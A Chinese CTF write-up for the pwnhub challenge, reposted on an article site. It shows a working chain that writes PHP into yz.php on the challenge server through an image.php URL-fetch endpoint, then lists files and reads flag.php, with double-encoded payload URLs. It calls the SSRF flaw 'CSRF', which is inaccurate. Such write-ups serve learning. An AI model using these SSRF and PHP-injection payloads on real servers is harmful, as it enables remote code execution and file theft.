您的位置:首页 > 编程语言 > PHP开发

pwnhub——胖哈勃外传-第一集 writeup

2016-12-18 00:10 239 查看

第一步 查找漏洞

查看漏洞



找了半天发现 源码中有一部分如下图

<script src="http://54.223.231.220/image.php?file=http://127.0.0.1:8888/test.png&path=logo.jpg"></script>


点击出现

console.log('logo.jpg update sucess!')
查看http://54.223.231.220/logo.jpg发现二维码
说明url将127.0.0.1:8888/test.png二维码存至logo.jpg下
典型的csrf跨站点请求访问


下面就要利用这个漏洞了

第二步 再查找漏洞

我们发现

<script src="http://54.223.231.220/image.php?file=http://127.0.0.1:8888/test.png&path=logo.jpg"></script>


没有什么利用的价值,我们容易伪造请求

那么继续找漏洞

http://54.223.231.220/?date/2016-07/




我们将url改为

http://54.223.231.220/?date/2016-07%3Cb%3Eyz%3C/b%3E/



至此 ,我们可以伪造请求了

第三步 伪造请求

http://54.223.231.220/image.php?file=http://127.0.0.1:8888/?date/2016-07<?php foreach(glob("./*") as $i) {echo $i;}?>/&path=yz.php
//注意二次编码为 http://54.223.231.220/image.php?file=http://127.0.0.1:8888/?date/2016-07%253c%253fphp%2520foreach(glob(%2522.%252f*%2522)%2520as%2520%2524i)%2520%257becho%2520%2524i%253b%257d%253f%253e/&path=yz.php[/code] 
得到



发现flag.php

现在把他读出来

http://54.223.231.220/image.php?file=http://127.0.0.1:8888/?date/2016-07<?php echo file_get_contents('flag.php')?>/&path=yz.php
二次编码为 http://54.223.231.220/image.php?file=http://127.0.0.1:8888/?date/2016-07%253c%253fphp%2becho%2bfile_get_contents(%2527flag.php%2527)%253f%253e/&path=yz.php[/code] 
得到
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  pwnhub php 漏洞
相关文章推荐
新的分享
章节导航